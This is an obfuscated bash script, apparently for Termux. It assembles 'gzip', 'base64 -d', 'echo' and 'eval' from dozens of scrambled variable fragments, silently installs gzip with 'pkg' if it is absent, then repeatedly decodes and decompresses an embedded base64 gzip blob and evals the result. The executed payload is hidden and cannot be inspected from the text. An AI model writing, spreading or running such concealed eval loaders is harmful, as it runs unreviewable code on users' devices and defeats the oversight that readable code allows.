#!/bin/bash
z="
";Cz='Zzzz';hz=']]; ';Nz=''\''ech';gz=' '\'''\'' ';iz='then';Dz='ZZzz';Xz=''\''';Gz='zzz=';Tz='e64'\''';lz='zzZZ';Jz='zZzZ';Bz='ZZZZ';Wz=''\'' -d';Oz='o'\''';Qz=''\''eva';Hz=''\''gzi';az='$zzz';Sz=''\''bas';oz='fi';Pz='zzZz';Iz='p'\''';jz='pkg ';fz='Zz =';kz='i $z';Fz='ZZZz';Kz='zZzz';dz='if [';Vz='Zzz=';Yz='$(wh';Ez='zzzz';Mz='zZz=';nz='y';Rz='l'\''';Lz='ZzzZ';ez='[ $z';Az='zzzZ';cz=')';bz='zZZZ';mz='zz -';Zz='ich ';Uz='zZZz';eval "$Az$Bz$Cz$Dz$Ez$Fz$Ez$Ez$Dz$Gz$Hz$Iz$z$Az$Az$Cz$Jz$Kz$Kz$Lz$Ez$Cz$Mz$Nz$Oz$z$Az$Jz$Kz$Pz$Jz$Az$Jz$Kz$Pz$Gz$Qz$Rz$z$Pz$Pz$Ez$Cz$Ez$Kz$Az$Ez$Kz$Gz$Sz$Tz$z$Pz$Kz$Az$Ez$Az$Az$Az$Uz$Az$Vz$Wz$Xz$z$Kz$Pz$Dz$Kz$Az$Az$Kz$Az$Ez$Mz$Yz$Zz$az$Bz$Dz$Uz$Ez$bz$Ez$Ez$Uz$Ez$cz$z$dz$ez$Cz$Jz$Cz$Cz$Pz$Pz$Cz$Pz$Ez$fz$gz$hz$iz$z$jz$kz$lz$Bz$Az$Cz$Az$Dz$Ez$Az$Cz$mz$nz$z$oz";zZzzzzzzzzZZZZZZZzzzzzzzzZZzzzZzzzZZzzz=$($zzzZzzzZZzzzzZzZzZzzzZzzZzzZzzzzZzzzzZz "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"|$zzZzzzZzzzzzZzzzzzzzzZzzzzzZzzzzzZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz);$zzzZzZzZzZzzzzZzzZzZzzzZzZzZzZzzzzZzzzz "$zZzzzzzzzzZZZZZZZzzzzzzzzZZzzzZzzzZZzzz"
